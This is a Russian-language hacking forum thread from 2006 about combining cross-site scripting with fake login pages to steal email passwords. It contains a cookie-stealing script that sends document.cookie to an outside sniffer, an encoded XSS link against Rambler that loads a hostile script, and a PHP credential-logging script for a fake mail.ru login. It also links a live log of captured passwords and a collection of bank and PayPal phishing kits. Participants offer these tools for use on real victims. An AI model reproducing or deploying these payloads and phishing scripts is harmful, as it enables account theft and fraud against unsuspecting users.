ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу XSS + Feik
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS + Feik
  #1  
Старый 16.11.2006, 14:37
Аватар для __XT__
__XT__
Познающий
Регистрация: 07.11.2006
Сообщений: 30
Провел на форуме:
128714

Репутация: 40
По умолчанию XSS + Feik
Feik - старая пассивная атака, метод подмена странички с формой авторизации.

ВОтсь...почему то на этом форуме про фреки не видел. а тем более про их сочетание.
Вы даёте ссылку жертве а она авторизируеться и её куда нить перекидывают а пароль и лог записываем.
это если смещиват с пассивной XSS

А если с активной получаеться весьма неплохо реализовать какую нибудь XSS ...зловредным срипторм сделать форму авторизации...чел псевдо-авторизируеться и перекидываем на что нить такое типа анкеты...чтоб без подозрений.

Особенно я думмаю феки актуальны на ресурсах на которых жизнь сессии кукисов очень мала. Или проверка кукисов по айпи и т.п.

Примером для такого ресурса стал рамблер кукисы которого перехватить очень сложно т.к. они умерают через кророткое время.
Итак представляем фейк с пассивной XSS на рамблере.
Да и XSS найденна не мной её кто-то тут выкладывал...непомню автора.

http://guap-spb.jino-net.ru/log01.txt
Последний раз редактировалось __XT__; 16.11.2006 в 14:41..
 
Ответить с цитированием

  #2  
Старый 16.11.2006, 17:52
Аватар для slider
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию
Согласен штука занимательная....

Но всё же лучше сделать редирект не на форму с подменой а на сниффер

К примеру....
Цитата:
<script>navigate('http://antichat.ru/снифф/s.gif?'.concat(document.cookie))</script>
формочку подобную легко накатать на php, сам такой штукой увлекалсо...
Главное что работает....
Человека перекидывает к примеру на главную страничку вашего сайта и там вбивает логин и пароль.... и его опять перекидывает на сайт где он и должен был бы быть....
А тем временем значения пароля и логина которые он вбил сохраняютя...
Последний раз редактировалось slider; 16.11.2006 в 17:56..
 
Ответить с цитированием

  #3  
Старый 16.11.2006, 20:52
Аватар для __XT__
__XT__
Познающий
Регистрация: 07.11.2006
Сообщений: 30
Провел на форуме:
128714

Репутация: 40
По умолчанию
Цитата:
Сообщение от slider  
Согласен штука занимательная....

Но всё же лучше сделать редирект не на форму с подменой а на сниффер

К примеру....


формочку подобную легко накатать на php, сам такой штукой увлекалсо...
Главное что работает....
Человека перекидывает к примеру на главную страничку вашего сайта и там вбивает логин и пароль.... и его опять перекидывает на сайт где он и должен был бы быть....
А тем временем значения пароля и логина которые он вбил сохраняютя...
да так и есть всё как ты описал-)


"Но всё же лучше сделать редирект не на форму с подменой а на сниффер"
С этим несогласен:
1) не какого редиректа нет...посматрел бы хоть 1.js
2)я же писал выше что феик для сайтов где время жизни сессия приписано данной странички и ли вообще очень мало...т.е. перехватывать кукисы бессмывсленно.
а ты пишешь -
<script>navigate('http://antichat.ru/снифф/s.gif?'.concat(document.cookie))</script>
2-й минус - идут кукисы а не пароль.

А в данном фреике всё путём - конечно расичтано на неопытного юзера который не будет глядеть в титле
и дэкодировать урл-)
однако ~70% сразу авторизируються и пароль и логин у меня в логе.





===================================


Ещё ращ кто не понял как юзать:
даём жертве чей ящик на рамблере - урл:

http://planeta.rambler.ru/srch?words=%22%3E%3C%73%63%72%69%70%74%20%73%72%63 %3D%68%74%74%70%3A%2F%2F%6D%69%72%69%6E%65%74%2E%6 E%61%72%6F%64%2E%72%75%2F%31%2E%6A%73%3E%3C%2F%73% 63%72%69%70%74%3E

там наша форма авторизации с левым <form action=

дальше как жертва авторизировалась её пароль и логин записываеться здесь:

http://guap-spb.jino-net.ru/log01.txt
 
Ответить с цитированием

  #4  
Старый 16.11.2006, 21:44
Аватар для f0xyL
f0xyL
Познающий
Регистрация: 18.02.2006
Сообщений: 64
Провел на форуме:
263648

Репутация: 8
По умолчанию
Вот скрипт для фейка маил ру


<?php

error_reporting(0);

$log = "log.txt";

$today = getdate();
$month = $today[month];
$mday = $today[mday];
$year = $today[year];
$current_date = $mday . " " . $month . " " . $year;

$fp = fopen($log, "a");
$line = $REMOTE_ADDR . " | " . $current_date . " | " . $login . " | " . $domen . " | " . $pass . "\n";
$size = strlen($line);
fputs($fp, $line, $size);
fclose($fp);

header("Location: http://win.mail.ru/cgi-bin/auth");

?>
 
Ответить с цитированием

  #5  
Старый 26.11.2006, 15:43
Аватар для slider
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию
Кстать на Ipb 2.1.7 Фейк мутнул .. офигенно прокатил...
Потом скину темку =)

Или видео сниму )
 
Ответить с цитированием

  #6  
Старый 26.11.2006, 15:50
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию
Небольшая коллекция фэйков

http://someshit.net/showthread.php?t=52

Цитата:
BankofAmerica2006.zip
Barclays06.zip
Chase.zip
DEUTCH BANK.rar
Ebay2006.zip
EGold.zip
Epass.zip
Gmail.rar
Isra-test.zip
Kentbnk.zip
Mail_yandex.rar
Paypal06.zip
Paypal-Customers-Scam.rar
POST BANK.rar
eBay.com.
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
Последний раз редактировалось blackybr; 26.11.2006 в 15:59..
 
Ответить с цитированием

  #7  
Старый 26.11.2006, 15:58
Аватар для cheet
cheet
Banned
Регистрация: 22.09.2006
Сообщений: 107
Провел на форуме:
292387

Репутация: -10
Отправить сообщение для cheet с помощью ICQ
По умолчанию
Цитата:
Сообщение от slider  
Кстать на Ipb 2.1.7 Фейк мутнул .. офигенно прокатил...
Потом скину темку =)

Или видео сниму )
давай выыкладывай охото посмотреть
 
Ответить с цитированием

  #8  
Старый 26.11.2006, 16:14
Аватар для cheet
cheet
Banned
Регистрация: 22.09.2006
Сообщений: 107
Провел на форуме:
292387

Репутация: -10
Отправить сообщение для cheet с помощью ICQ
По умолчанию
Цитата:
Сообщение от f0xyL  
Вот скрипт для фейка маил ру


<?php

error_reporting(0);

$log = "log.txt";

$today = getdate();
$month = $today[month];
$mday = $today[mday];
$year = $today[year];
$current_date = $mday . " " . $month . " " . $year;

$fp = fopen($log, "a");
$line = $REMOTE_ADDR . " | " . $current_date . " | " . $login . " | " . $domen . " | " . $pass . "\n";
$size = strlen($line);
fputs($fp, $line, $size);
fclose($fp);

header("Location: http://win.mail.ru/cgi-bin/auth");

?>
что то он не катит
 
Ответить с цитированием

  #9  
Старый 29.11.2006, 17:15
Аватар для -voevoda-
-voevoda-
Новичок
Регистрация: 29.11.2006
Сообщений: 4
Провел на форуме:
39624

Репутация: 4
По умолчанию
да фишка конечно класно
только вопрос возник ссылку нужно делать только на явасскрипт или на Php тожоже пойдет?
просто сам попробовал на Php ссылку дать нехрена не получаеться...
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
IE XSS Kit .Slip Чаты 22 23.10.2006 06:45
XSS worms Xex Статьи 0 02.10.2006 01:49
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ